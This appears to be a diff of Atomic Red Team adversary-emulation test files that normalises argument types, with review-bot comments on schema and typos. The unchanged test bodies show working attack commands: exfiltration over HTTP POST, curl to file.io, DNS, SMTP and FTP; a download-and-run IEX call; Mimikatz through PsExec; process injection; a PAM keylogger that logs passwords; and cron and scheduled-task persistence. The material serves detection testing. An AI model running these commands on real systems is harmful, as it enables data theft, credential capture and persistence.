Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive
if(-not (Test-Path #{filepath})){
1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." }
}
[System.Net.ServicePointManager]::Expect100Continue = $false
$filecontent = Get-Content -Path #{filepath}
Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive
name: powershell
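Review bot: `destination_url` is described as a URL but typed `string`; this commit uses `type: url` for URL arguments elsewhere (the `url_path` and `remote_file` arguments earlier in this diff), so `url` would be the consistent choice here. The executor block appears fully removed and re-added with identical content, which looks like an indentation or line-ending change only; worth confirming with `git diff -w`.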
+14 -14
@@ -13,7 +13,7 @@ atomic_tests:
input_arguments:
host:
description: Host to scan.
type: String
type: string
default: 192.168.1.1
executor:
command: |
@@ -31,15 +31,15 @@ atomic_tests:
input_arguments:
host:
description: Host to scan.
type: String
type: string
default: 192.168.1.1
port:
description: Ports to scan.
type: String
type: string
default: "80"
network_range:
description: Network Range to Scan.
type: String
type: string
default: 192.168.1.0/24
dependency_executor_name: sh
dependencies:
@@ -76,11 +76,11 @@ atomic_tests:
input_arguments:
nmap_url:
description: NMap installer download URL
type: Url
type: url
default: https://nmap.org/dist/nmap-7.80-setup.exe
host_to_scan:
description: The host to scan with NMap
type: String
type: string
default: 127.0.0.1
dependency_executor_name: powershell
dependencies:
@@ -104,20 +104,20 @@ atomic_tests:
input_arguments:
host_ip:
description: Host to scan.
type: String
type: string
default: 127.0.0.1
filename:
description: Location of the project file
type: Path
type: path
default: PathToAtomicsFolder\T1046\src\T1046.py
dependency_executor_name: powershell
dependencies:
- description: |
Check if python exists on the machine
prereq_command: |
if (python --version) {exit 0} else {exit 1}
get_prereq_command: |
echo "Python 3 must be installed manually"
- description: |
Check if python exists on the machine
prereq_command: |
if (python --version) {exit 0} else {exit 1}
get_prereq_command: |
echo "Python 3 must be installed manually"
executor:
command: |
python #(unknown) -i #{host_ip}
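Review bot: the executor line at the end of this hunk renders as `python #(unknown) -i #{host_ip}`, which is not a valid argument reference. The argument declared above is `filename` (default `PathToAtomicsFolder\T1046\src\T1046.py`), so the command should read `python #{filename} -i #{host_ip}`; please confirm the file contains `#{filename}` and that this is only a rendering problem.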
+13 -13
@@ -47,11 +47,11 @@ atomic_tests:
input_arguments:
node:
description: Ip Address
type: String
type: string
default: 127.0.0.1
service_search_string:
description: Name Of Service
type: String
type: string
default: Spooler
executor:
command: |
@@ -67,7 +67,7 @@ atomic_tests:
input_arguments:
process_to_execute:
description: Name or path of process to execute.
type: String
type: string
default: notepad.exe
executor:
command: |
@@ -86,19 +86,19 @@ atomic_tests:
input_arguments:
node:
description: Ip Address
type: String
type: string
default: 127.0.0.1
user_name:
description: Username
type: String
type: string
default: DOMAIN\Administrator
password:
description: Password
type: String
type: string
default: P@ssw0rd1
process_to_execute:
description: Name or path of process to execute.
type: String
type: string
default: notepad.exe
executor:
command: |
@@ -132,11 +132,11 @@ atomic_tests:
input_arguments:
new_class:
description: Derived class name
type: String
type: string
default: Win32_Atomic
process_to_execute:
description: Name or path of process to execute.
type: String
type: string
default: notepad.exe
executor:
name: powershell
@@ -158,15 +158,15 @@ atomic_tests:
input_arguments:
node:
description: Ip Address
type: String
type: string
default: 127.0.0.1
dll_to_execute:
description: Path to DLL.
type: String
type: string
default: $env:TEMP\calc.dll
function_to_execute:
description: Name of DLL function to call
type: String
type: string
default: StartW
dependency_executor_name: powershell
dependencies:
@@ -192,7 +192,7 @@ atomic_tests:
default: 127.0.0.1
product:
description: Enter the product name being uninstalled. This will default to TightVNC.
type: String
type: string
default: Tightvnc
dependency_executor_name: powershell
dependencies:
+9 -9
@@ -1,23 +1,23 @@
attack_technique: T1048.002
display_name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
atomic_tests:
- name: Exfiltrate data HTTPS using curl windows
- name: Exfiltrate data HTTPS using curl windows
auto_generated_guid: 1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0
description: |
Exfiltrate data HTTPS using curl to file share site file.io
supported_platforms:
- windows
- windows
input_arguments:
input_file:
description: Test file to upload
type: Path
type: path
default: PathToAtomicsFolder/T1048.002/src/artifact
curl_path:
description: path to curl.exe
type: Path
type: path
default: C:\Windows\System32\Curl.exe
dependency_executor_name: powershell
dependencies:
dependency_executor_name: powershell
dependencies:
- description: |
Curl must be installed on system.
prereq_command: |
@@ -45,12 +45,12 @@ atomic_tests:
description: |
Exfiltrate data HTTPS using curl to file share site file.io
supported_platforms:
- macos
- linux
- macos
- linux
input_arguments:
input_file:
description: Test file to upload
type: Path
type: path
default: PathToAtomicsFolder/T1048.002/src/artifact
executor:
name: bash
+28 -28
@@ -37,11 +37,11 @@ atomic_tests:
input_arguments:
input_file:
description: Path to file to be exfiltrated.
type: Path
type: path
default: C:\Windows\System32\notepad.exe
ip_address:
description: Destination IP address where the data should be sent.
type: String
type: string
default: 127.0.0.1
executor:
command: |
@@ -64,57 +64,57 @@ atomic_tests:
xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done
3. Once the data is received, use the below command to recover the data.
cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r
name: manual
- name: Exfiltration Over Alternative Protocol - HTTP
auto_generated_guid: 6aa58451-1121-4490-a8e9-1dada3f1c68c
description: |
Exfiltration of specified file over HTTP.
Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout.
Exfiltration of specified file over HTTP.
Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout.
supported_platforms:
- windows
executor:
command: |
$content = Get-Content #{input_file}
Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content
$content = Get-Content #{input_file}
Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content
name: powershell
input_arguments:
input_file:
description: Path to file to exfiltrate
type: Path
type: path
default: C:\Windows\System32\notepad.exe
ip_address:
description: Destination IP address where the data should be sent
type: String
type: string
default: http://127.0.0.1
- name: Exfiltration Over Alternative Protocol - SMTP
auto_generated_guid: ec3a835e-adca-4c7c-88d2-853b69c11bb9
description: |
Exfiltration of specified file over SMTP.
Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout.
Exfiltration of specified file over SMTP.
Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout.
supported_platforms:
- windows
executor:
command: |
Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server}
Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server}
name: powershell
input_arguments:
input_file:
description: Path to file to exfiltrate
type: Path
type: path
default: C:\Windows\System32\notepad.exe
sender:
description: The email address of the sender
type: String
type: string
default: "test@corp.com"
receiver:
description: The email address of the receiver
type: String
type: string
default: "test@corp.com"
smtp_server:
description: SMTP server to use for email transportation
type: String
type: string
default: "127.0.0.1"
- name: MAZE FTP Upload
auto_generated_guid: 57799bc2-ad1e-4130-a793-fb0c385130ba
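Review bot: the `ip_address` argument of the HTTP test (`description: Destination IP address where the data should be sent`, `default: http://127.0.0.1`) is described as an IP address but its default is a URL and it is passed to `Invoke-WebRequest -Uri`; with the new schema types available, `type: url` and a description of "Destination URL" would match what the executor actually consumes. While this hunk rewrites the SMTP description lines, the typo "exfiltrateto a remote address" is carried over unchanged and could be fixed to "exfiltrate to a remote address" in the same edit.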
@@ -127,15 +127,15 @@ atomic_tests:
input_arguments:
ftp_server:
description: FTP Server address
type: String
type: string
default: 127.0.0.1
username:
description: Username for FTP server login
type: String
type: string
default:
password:
description: Password for FTP server login
type: String
type: string
default:
executor:
command: |
@@ -151,13 +151,13 @@ atomic_tests:
else
{echo "FTP Server Unreachable. Please verify the server address in input args and try again."}
cleanup_command: |
$ftp = "ftp://#{ftp_server}/"
try {foreach ($file in (dir "$env:windir\temp" "*.7z"))
{$uri = New-Object System.Uri($ftp+$file.name)
$ftp_del = [System.Net.FtpWebRequest]::create($uri)
$ftp_del.Credentials = New-Object System.Net.NetworkCredential('#{username}','#{password}')
$ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile
$ftp_del.GetResponse()}} catch{}
$ftp = "ftp://#{ftp_server}/"
try {foreach ($file in (dir "$env:windir\temp" "*.7z"))
{$uri = New-Object System.Uri($ftp+$file.name)
$ftp_del = [System.Net.FtpWebRequest]::create($uri)
$ftp_del.Credentials = New-Object System.Net.NetworkCredential('#{username}','#{password}')
$ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile
$ftp_del.GetResponse()}} catch{}
name: powershell
- name: Exfiltration Over Alternative Protocol - FTP - Rclone
auto_generated_guid: b854eb97-bf9b-45ab-a1b5-b94e4880c56b
@@ -189,10 +189,10 @@ atomic_tests:
Check if the exfil package exists
prereq_command: |
if (Test-Path C:\Users\Public\Downloads\exfil.zip) {exit 0} else {exit 1}
get_prereq_command: |
get_prereq_command: |
fsutil file createnew C:\Users\Public\Downloads\exfil.zip 20485760
- description: 'Check if rclone zip exists'
prereq_command: |
prereq_command: |
if (Test-Path C:\Users\Public\Downloads\rclone-current-windows-amd64.zip) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "C:\Users\Public\Downloads\rclone-current-windows-amd64.zip"
+11 -11
@@ -15,7 +15,7 @@ atomic_tests:
input_arguments:
domain:
description: target SSH domain
type: Url
type: url
default: target.example.com
executor:
command: |
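Review bot: `domain` is retyped to `url`, but its default `target.example.com` is a bare hostname and the description says "target SSH domain"; a validator that checks `url`-typed defaults for a scheme will reject this. Either keep `type: string` (hostname) or make the default a real URL. The same applies to the second `domain` argument in the following hunk of this file.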
@@ -35,15 +35,15 @@ atomic_tests:
input_arguments:
user_name:
description: username for domain
type: String
type: string
default: atomic
password:
description: password for user
type: String
type: string
default: atomic
domain:
description: target SSH domain
type: Url
type: url
default: target.example.com
executor:
command: |
@@ -60,28 +60,28 @@ atomic_tests:
input_arguments:
password:
description: Password used to encrypt the data to be exfiltrated
type: String
type: string
default: atomic
domain:
description: The domain name to use for DNS requests
type: String
type: string
default: target.example.com
ps_module:
description: DNSExfiltrator powershell ps_module
type: Path
type: path
default: '$env:Temp\dnsexfil.ps1'
doh:
description: Google or CloudFlare DoH (DNS over HTTP) server
type: String
type: string
default: google
time:
description: The time in milliseconds to wait between each DNS request
type: String
type: string
default: 500
encoding:
description: Set to '-b32' to use base32 encoding of data. Might be required by some DNS resolvers.
type: String
default: null
type: string
default:
dependency_executor_name: powershell
dependencies:
- description: |
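Review bot: changing `default: null` to a bare `default:` for `encoding` is a no-op for YAML loaders (both parse as null), so confirm the new JSON schema permits a null default on a `string`-typed argument; otherwise `default: ''` states the intent explicitly. Separately, `time` is typed `string` but its unquoted default `500` is parsed as an integer; quote it (`"500"`, as `"20:10"` is quoted elsewhere in this commit) or type it `integer` so the type and default agree.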
+14 -14
@@ -57,34 +57,34 @@ atomic_tests:
sharpview.exe located in the bin folder, an opensource red-team tool.
Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
supported_platforms:
- windows
- windows
input_arguments:
SharpView_url:
description: sharpview download URL
type: Url
type: url
default: https://github.com/tevora-threat/SharpView/blob/b60456286b41bb055ee7bc2a14d645410cca9b74/Compiled/SharpView.exe?raw=true
SharpView:
description: Path of the executable opensource redteam tool used for the performing this atomic.
type: Path
type: path
default: PathToAtomicsFolder\T1049\bin\SharpView.exe
syntax:
description: Arguements method used along with SharpView to get listing of network connections, domains, domain users, and etc.
type: String
default: |
description: Arguements method used along with SharpView to get listing of network connections, domains, domain users, and etc.
type: string
default: |
"Invoke-ACLScanner", "Invoke-Kerberoast", "Find-DomainShare"
dependency_executor_name: powershell
dependencies:
- description: |
Sharpview.exe must exist on disk at specified location (#{SharpView})
prereq_command: |
if (Test-Path #{SharpView}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null
Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}"
- description: |
Sharpview.exe must exist on disk at specified location (#{SharpView})
prereq_command: |
if (Test-Path #{SharpView}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null
Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}"
executor:
name: powershell
elevation_required: true
command: |
command: |
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
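Review bot: the `syntax` argument keeps `default: |`, which yields a literal block ending in a newline that is then substituted into `$syntaxList = #{syntax}`; `|-` (as this commit uses for the T1053.002 executor) drops the trailing newline and is the safer choice for an inline substitution. The rewritten description line still carries the typo "Arguements method used along with SharpView", which could be corrected to "Argument(s) passed to SharpView" while the line is being touched.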
+18 -19
@@ -1,4 +1,3 @@
---
attack_technique: T1053.002
display_name: 'Scheduled Task/Job: At'
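Review bot: dropping the `---` document-start marker is harmless for a single-document YAML file, but it should be done uniformly; this commit removes it from T1053.002, T1053.003 and T1053.005 only, so a follow-up check that no other atomic still begins with `---` would keep the corpus consistent with the schema-driven generator.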
@@ -11,7 +10,7 @@ atomic_tests:
Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time.
supported_platforms:
- windows
- windows
executor:
name: command_prompt
elevation_required: false
@@ -23,35 +22,35 @@ atomic_tests:
This test submits a command to be run in the future by the `at` daemon.
supported_platforms:
- linux
- linux
input_arguments:
time_spec:
description: Time specification of when the command should run
type: String
type: string
default: now + 1 minute
at_command:
description: The command to be run
type: String
type: string
default: echo Hello from Atomic Red Team
dependency_executor_name: sh
dependencies:
- description: |
The `at` and `atd` executables must exist in the PATH
prereq_command: |
which at && which atd
get_prereq_command: |
echo 'Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'
- description: |
The `atd` daemon must be running
prereq_command: |
systemctl status atd || service atd status
get_prereq_command: |
echo 'Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'
- description: |
The `at` and `atd` executables must exist in the PATH
prereq_command: |
which at && which atd
get_prereq_command: |
echo 'Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'
- description: |
The `atd` daemon must be running
prereq_command: |
systemctl status atd || service atd status
get_prereq_command: |
echo 'Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'
executor:
name: sh
elevation_required: false
command: |
echo "#{at_command}" | at #{time_spec}
command: |-
echo "#{at_command}" | at #{time_spec}
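Review bot: this executor's `command` is switched from `|` to `|-`, while every other executor in this commit keeps `|`. Both are valid block scalars (`|-` strips the final newline), but mixing them makes the generated output differ by a trailing newline between tests; pick one style for all `command`, `cleanup_command` and `prereq_command` blocks.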
+11 -12
@@ -1,4 +1,3 @@
---
attack_technique: T1053.003
display_name: 'Scheduled Task/Job: Cron'
atomic_tests:
@@ -7,16 +6,16 @@ atomic_tests:
description: |
This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.
supported_platforms:
- macos
- linux
- macos
- linux
input_arguments:
command:
description: Command to execute
type: String
type: string
default: /tmp/evil.sh
tmp_cron:
description: Temporary reference file to hold evil cron schedule
type: Path
type: path
default: /tmp/persistevil
executor:
name: bash
@@ -30,16 +29,16 @@ atomic_tests:
description: |
This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
supported_platforms:
- macos
- linux
- macos
- linux
input_arguments:
command:
description: Command to execute
type: String
type: string
default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log
cron_script_name:
description: Name of file to store in cron folder
type: String
type: string
default: persistevil
executor:
elevation_required: true
@@ -59,15 +58,15 @@ atomic_tests:
description: |
This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
supported_platforms:
- linux
- linux
input_arguments:
command:
description: Command to execute
type: String
type: string
default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log
cron_script_name:
description: Name of file to store in /var/spool/cron/crontabs folder
type: String
type: string
default: persistevil
executor:
elevation_required: true
+35 -37
@@ -1,4 +1,3 @@
---
attack_technique: T1053.005
display_name: 'Scheduled Task/Job: Scheduled Task'
atomic_tests:
@@ -23,15 +22,15 @@ atomic_tests:
description: |
Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10.
supported_platforms:
- windows
- windows
input_arguments:
task_command:
description: What you want to execute
type: String
type: string
default: C:\windows\system32\cmd.exe
time:
description: What time 24 Hour
type: String
type: string
default: "20:10"
executor:
name: command_prompt
@@ -43,31 +42,30 @@ atomic_tests:
- name: Scheduled task Remote
auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd
description: |
Create a task on a remote system.
Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint.
Create a task on a remote system.
Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint.
supported_platforms:
- windows
- windows
input_arguments:
task_command:
description: What you want to execute
type: String
type: string
default: C:\windows\system32\cmd.exe
time:
description: What time 24 Hour
type: String
type: string
default: "20:10"
target:
description: Target
type: String
type: string
default: localhost
user_name:
description: 'Username to authenticate with, format: DOMAIN\User'
type: String
type: string
default: DOMAIN\user
password:
description: Password to authenticate with
type: String
type: string
default: At0micStrong
executor:
name: command_prompt
@@ -83,7 +81,7 @@ atomic_tests:
Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10.
supported_platforms:
- windows
- windows
executor:
name: powershell
elevation_required: false
@@ -106,7 +104,7 @@ atomic_tests:
input_arguments:
ms_product:
description: Maldoc application Word
type: String
type: string
default: Word
dependency_executor_name: powershell
dependencies:
@@ -127,28 +125,28 @@ atomic_tests:
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
name: powershell
cleanup_command : |
cleanup_command: |
Unregister-ScheduledTask -TaskName "Run Notepad" -Confirm:$false
- name: WMI Invoke-CimMethod Scheduled Task
auto_generated_guid: e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b
description: |
Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes.
supported_platforms:
- windows
- windows
input_arguments:
xml_path:
description: path of vbs to use when creating masquerading files
type: Path
type: path
default: PathToAtomicsFolder\T1053.005\src\T1053_005_WMI.xml
dependency_executor_name: powershell
dependencies:
- description: |
File to copy must exist on disk at specified location (#{xml_path})
prereq_command: |
if (Test-Path #{xml_path}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{xml_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_005_WMI.xml" -OutFile "#{xml_path}"
- description: |
File to copy must exist on disk at specified location (#{xml_path})
prereq_command: |
if (Test-Path #{xml_path}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{xml_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_005_WMI.xml" -OutFile "#{xml_path}"
executor:
name: powershell
elevation_required: true
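Review bot: the `xml_path` description "path of vbs to use when creating masquerading files" does not describe this argument; it is the scheduled-task definition XML that `PS_ScheduledTask` imports (default `T1053_005_WMI.xml`). Since the hunk already rewrites these lines, replace the description with something like "Path to the scheduled task XML definition to import".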
@@ -163,7 +161,7 @@ atomic_tests:
A Base64 Encoded command will be stored in the registry (ping 127.0.0.1) and then a scheduled task will be created.
The scheduled task will launch powershell to decode and run the command in the registry daily.
This is a persistence mechanism recently seen in use by Qakbot.
[Additiona Information](https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/)
supported_platforms:
- windows
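Review bot: the only change in this hunk appears to be whitespace, so while the line is being touched the typo "[Additiona Information]" in the description could be corrected to "[Additional Information]".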
@@ -180,27 +178,27 @@ atomic_tests:
schtasks /delete /tn "ATOMIC-T1053.005" /F >nul 2>&1
reg delete HKCU\SOFTWARE\ATOMIC-T1053.005 /F >nul 2>&1
name: command_prompt
- name: Import XML Schedule Task with Hidden Attribute
- name: Import XML Schedule Task with Hidden Attribute
auto_generated_guid: cd925593-fbb4-486d-8def-16cbdf944bf4
description: |
Create an scheduled task that executes calc.exe after user login from XML that contains hidden setting attribute.
This technique was seen several times in tricbot malware and also with the targetted attack campaigne the industroyer2.
supported_platforms:
- windows
- windows
input_arguments:
xml_path:
description: path of vbs to use when creating masquerading files
type: Path
type: path
default: PathToAtomicsFolder\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml
dependency_executor_name: powershell
dependencies:
- description: |
File to copy must exist on disk at specified location (#{xml_path})
prereq_command: |
if (Test-Path #{xml_path}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{xml_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_05_SCTASK_HIDDEN_ATTRIB.xml" -OutFile "#{xml_path}"
- description: |
File to copy must exist on disk at specified location (#{xml_path})
prereq_command: |
if (Test-Path #{xml_path}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{xml_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_05_SCTASK_HIDDEN_ATTRIB.xml" -OutFile "#{xml_path}"
executor:
name: powershell
elevation_required: true
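Review bot: as in the WMI test above, `xml_path` here is described as "path of vbs to use when creating masquerading files" although it points at `T1053_05_SCTASK_HIDDEN_ATTRIB.xml`; the description should say it is the task XML to import. The surrounding description also has several typos ("Create an scheduled task", "targetted attack campaigne", "tricbot") that could be cleaned up in the same pass.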
@@ -217,7 +215,7 @@ atomic_tests:
Upon successful execution, powershell.exe will create a scheduled task and modify the action.
supported_platforms:
- windows
- windows
executor:
name: powershell
elevation_required: false
+9 -9
@@ -7,23 +7,23 @@ atomic_tests:
description: |
This test creates Systemd service and timer then starts and enables the Systemd timer
supported_platforms:
- linux
- linux
input_arguments:
path_to_systemd_service:
description: Path to systemd service unit file
type: Path
type: path
default: /etc/systemd/system/art-timer.service
path_to_systemd_timer:
description: Path to service timer file
type: Path
type: path
default: /etc/systemd/system/art-timer.timer
systemd_service_name:
description: Name of systemd service
type: String
type: string
default: art-timer.service
systemd_timer_name:
description: Name of systemd service timer
type: String
type: string
default: art-timer.timer
executor:
command: |
@@ -58,7 +58,7 @@ atomic_tests:
description: |
Schedule a user level transient task (will not survive a reboot) without having to create the .timer or .service files by using the systemd-run command.
supported_platforms:
- linux
- linux
dependency_executor_name: sh
dependencies:
- description: |
@@ -68,7 +68,7 @@ atomic_tests:
get_prereq_command: |
echo "Install systemd on the machine."; exit 1;
executor:
elevation_required: false
elevation_required: false
command: |
systemd-run --user --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo "$(date) $(whoami)" >>/tmp/log'
cleanup_command: |
@@ -82,7 +82,7 @@ atomic_tests:
description: |
Schedule a system level transient task (will not survive a reboot) without having to create the .timer or .service files by using the systemd-run command.
supported_platforms:
- linux
- linux
dependency_executor_name: sh
dependencies:
- description: |
@@ -92,7 +92,7 @@ atomic_tests:
get_prereq_command: |
echo "Install systemd on the machine."; exit 1;
executor:
elevation_required: true
elevation_required: true
command: |
systemd-run --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo "$(date) $(whoami)" >>/tmp/log'
cleanup_command: |
+2 -2
@@ -10,7 +10,7 @@ atomic_tests:
input_arguments:
namespace:
description: K8s namespace to list
type: String
type: string
default: default
dependencies:
- description: |
@@ -33,7 +33,7 @@ atomic_tests:
input_arguments:
namespace:
description: K8s namespace to list
type: String
type: string
default: default
dependencies:
- description: |
+2 -2
@@ -13,11 +13,11 @@ atomic_tests:
input_arguments:
process_id:
description: PID of input_arguments
type: Integer
type: integer
default: (Start-Process notepad -PassThru).id
dll_payload:
description: DLL to Inject
type: Path
type: path
default: PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll
dependency_executor_name: powershell
dependencies:
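Review bot: `process_id` is retyped to `integer`, but its default `(Start-Process notepad -PassThru).id` is a PowerShell expression that the executor evaluates, not an integer literal; a validator that checks defaults against the declared type will reject it. Either type it `string` with a note that the default is evaluated at run time, or give it a numeric placeholder and document the expression in the description.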
+3 -4
@@ -18,10 +18,10 @@ atomic_tests:
input_arguments:
exe_binary:
description: Output Binary
type: Path
type: path
default: PathToAtomicsFolder\T1055.004\bin\T1055.exe
dependency_executor_name: powershell
dependencies:
dependency_executor_name: powershell
dependencies:
- description: |
#{exe_binary} must be exist on system.
prereq_command: |
@@ -33,4 +33,3 @@ atomic_tests:
command: |
#{exe_binary}
name: command_prompt
+5 -5
@@ -11,19 +11,19 @@ atomic_tests:
input_arguments:
hollow_binary_path:
description: Path of the binary to hollow (executable that will run inside the sponsor)
type: String
type: string
default: C:\Windows\System32\cmd.exe
parent_process_name:
description: Name of the parent process
type: String
type: string
default: explorer
sponsor_binary_path:
description: Path of the sponsor binary (executable that will host the binary)
type: String
type: string
default: C:\Windows\System32\notepad.exe
spawnto_process_name:
description: Name of the process to spawn
type: String
type: string
default: notepad
executor:
command: |
@@ -42,7 +42,7 @@ atomic_tests:
input_arguments:
ms_product:
description: Maldoc application Word
type: String
type: string
default: Word
dependency_executor_name: powershell
dependencies:
+5 -5
@@ -14,7 +14,7 @@ atomic_tests:
input_arguments:
txt_path:
description: Path to file containing VBA macro to run
type: Path
type: path
default: PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt
dependency_executor_name: powershell
dependencies:
@@ -55,15 +55,15 @@ atomic_tests:
input_arguments:
machine:
description: machine to target (via psexec)
type: String
type: string
default: DC1
mimikatz_path:
description: Mimikatz windows executable
type: Path
type: path
default: '%tmp%\mimikatz\x64\mimikatz.exe'
psexec_path:
description: Path to PsExec
type: String
type: string
default: C:\PSTools\PsExec.exe
dependency_executor_name: powershell
dependencies:
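Review bot: `psexec_path` is described as "Path to PsExec" with a filesystem default (`C:\PSTools\PsExec.exe`) but is typed `string`, while `mimikatz_path` in the same argument list is typed `path`; since this commit is normalising types, `psexec_path` should be `type: path` too.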
@@ -97,7 +97,7 @@ atomic_tests:
elevation_required: false # locally not, but remotely on target machine then yes
- name: Section View Injection
auto_generated_guid: c6952f41-6cf0-450a-b352-2ca8dae7c178
description: |
description: |
This test creates a section object in the local process followed by a local section view.
The shellcode is copied into the local section view and a remote section view is created in the target process, pointing to the local section view.
A thread is then created in the target process, using the remote section view as start address.
+70 -71
@@ -14,7 +14,7 @@ atomic_tests:
input_arguments:
filepath:
description: Name of the local file, include path.
type: Path
type: path
default: $env:TEMP\key.log
dependencies:
- description: |
@@ -36,7 +36,7 @@ atomic_tests:
Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log. All terminal activity on any new logins would then be archived and readable by an adversary with elevated privledges.
Passwords hidden by the console can also be logged, with 'log_passwd' as in this example. If root logging is enabled, then output from any process which is later started by root is also logged, even if this policy is carefully enabled (e.g. 'disable=*' as the initial command).
Use 'aureport --tty' or other audit.d reading tools to read the log output, which is binary. Mac OS does not currently contain the pam_tty_audit.so library.
dependencies:
- description: |
@@ -48,13 +48,12 @@ atomic_tests:
supported_platforms:
- linux
executor:
command:
if sudo test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi;
if sudo test -f /etc/pam.d/system-auth; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi;
sudo touch /tmp/password-auth.bk
sudo touch /tmp/system-auth.bk
sudo echo "session required pam_tty_audit.so enable=* log_password" >> /etc/pam.d/password-auth
sudo echo "session required pam_tty_audit.so enable=* log_password" >> /etc/pam.d/system-auth
command: if sudo test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth
/tmp/password-auth.bk; fi; if sudo test -f /etc/pam.d/system-auth; then sudo
cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi; sudo touch /tmp/password-auth.bk
sudo touch /tmp/system-auth.bk sudo echo "session required pam_tty_audit.so
enable=* log_password" >> /etc/pam.d/password-auth sudo echo "session required pam_tty_audit.so
enable=* log_password" >> /etc/pam.d/system-auth
cleanup_command: |
sudo cp -f /tmp/password-auth.bk /etc/pam.d/password-auth
sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth
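Review bot: the `command:` key here has no block indicator, so both before and after this hunk it is a plain multi-line scalar and YAML folds the line breaks into spaces; the reflow in this hunk makes that explicit, e.g. `sudo touch /tmp/password-auth.bk` `sudo touch /tmp/system-auth.bk sudo echo "session required ...` becomes a single `touch` invocation with the later words as arguments, and the `>>` redirections apply to that one command. Use `command: |` with one shell command per line, as `cleanup_command: |` directly below already does.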
@@ -67,25 +66,25 @@ atomic_tests:
